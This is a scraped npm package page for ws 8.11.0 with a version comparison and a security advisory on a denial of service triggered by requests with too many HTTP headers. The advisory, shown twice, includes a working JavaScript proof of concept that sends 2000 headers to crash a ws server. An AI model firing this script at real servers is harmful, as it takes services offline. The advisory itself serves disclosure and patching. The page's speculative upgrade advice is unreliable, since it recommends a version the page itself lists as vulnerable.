Version Details and Security Vulnerabilities

📦

ws

8.11.0

Comparision Betweeen 8.11.0 and 8.10.0

Identify the differences between the current version of the package and the previous one.

Version

Dependencies

Dev Dependencies

Peer Dependencies

Distributed Files

Unpacked Size

132.17 KB

131.46 KB

Version 8.11.0 Details

The ws package, a popular choice for WebSocket communication in Node.js, released version 8.11.0 following closely after version 8.10.0. Both versions maintain the core features - aimed at providing a simple, fast, and reliable WebSocket solution for both client and server implementations. Examining the package metadata reveals some interesting changes between these two releases that may influence a developer's decision to upgrade.

Although all devDependencies remain the same, indicating no modifications in the tooling or testing environment, and peerDependencies, essential for compatibility, are also identical, there are subtle differences in the package distribution. While fileCount stays constant at 19, the unpackedSize of version 8.11.0 is slightly larger. The new version goes from 134610 to 135341 bytes, suggesting minor code adjustments, potentially bug fixes, or performance improvements, that weren't significant enough to change the file structure. The date stamp confirms a release roughly two weeks apart which further supports that those have been hot fixes

Developers should consider upgrading to version 8.11.0 to benefit from these potential improvements. Reviewing the changelog corresponding to these versions on the project's GitHub repository on websockets/ws.git is highly recommended to gain a clearer understanding of the specific changes incorporated and ensuring seamless integration with their existing WebSocket implementations.

Security Vulnerabilities

This site is an independent open-source project and is not affiliated with, endorsed by, or sponsored by npm, Inc. or GitHub, Inc. The name “npm” is a registered trademark of npm, Inc., used here solely to describe compatibility and reference publicly available npm package data.

Version Details and Security Vulnerabilities

📦

ws

8.11.0

Comparision Betweeen 8.11.0 and 8.10.0

Identify the differences between the current version of the package and the previous one.

Version

Dependencies

Dev Dependencies

Peer Dependencies

Distributed Files

Unpacked Size

132.17 KB

131.46 KB

Version 8.11.0 Details

Security Vulnerabilities

Security Details

Comprehensive list of direct or transitive vulnerabilities for version 8.11.0 of the package ws.

All Security Vulnerabilities

All the vulnerabilities related to the version 8.11.0 of the package

Summary:

ws affected by a DoS when handling a request with many HTTP headers

Details:

Impact

A request with a number of headers exceeding theserver.maxHeadersCount threshold could be used to crash a ws server.

Proof of concept

const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});

Patches

The vulnerability was fixed in ws@8.17.1 (https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c) and backported to ws@7.5.10 (https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f), ws@6.2.3 (https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63), and ws@5.2.4 (https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e)

Workarounds

In vulnerable versions of ws, the issue can be mitigated in the following ways:

Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.
Set server.maxHeadersCount to 0 so that no limit is applied.

Credits

The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.

References

https://github.com/websockets/ws/issues/2230
https://github.com/websockets/ws/pull/2231

Details about ws@8.11.0

Security Details

Comprehensive list of direct or transitive vulnerabilities for version 8.11.0 of the package ws.

All Security Vulnerabilities

All the vulnerabilities related to the version 8.11.0 of the package

Summary:

ws affected by a DoS when handling a request with many HTTP headers

Details:

Impact

A request with a number of headers exceeding theserver.maxHeadersCount threshold could be used to crash a ws server.

Proof of concept

const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});

Patches

Workarounds

In vulnerable versions of ws, the issue can be mitigated in the following ways:

Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.
Set server.maxHeadersCount to 0 so that no limit is applied.

Credits

The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.

References

https://github.com/websockets/ws/issues/2230
https://github.com/websockets/ws/pull/2231

Details about ws@8.11.0

Version Details and Security Vulnerabilities

ws

Comparision Betweeen 8.11.0 and 8.10.0

Version 8.11.0 Details

Security Vulnerabilities

Version Details and Security Vulnerabilities

ws

Comparision Betweeen 8.11.0 and 8.10.0

Version 8.11.0 Details

Security Vulnerabilities

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

Impact

Proof of concept

Patches

Workarounds

Credits

References

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

Impact

Proof of concept

Patches

Workarounds

Credits

References

Version Details and Security Vulnerabilities

ws

Comparision Betweeen 8.11.0 and 8.10.0

Version 8.11.0 Details

Security Vulnerabilities

Version Details and Security Vulnerabilities

ws

Comparision Betweeen 8.11.0 and 8.10.0

Version 8.11.0 Details

Security Vulnerabilities

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

ws@8.11.0 GHSA-3h5v-q93c-6h6q 8.7

Impact

Proof of concept

Patches

Workarounds

Credits

References

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

ws@8.11.0 GHSA-3h5v-q93c-6h6q 8.7

Impact

Proof of concept

Patches

Workarounds

Credits

References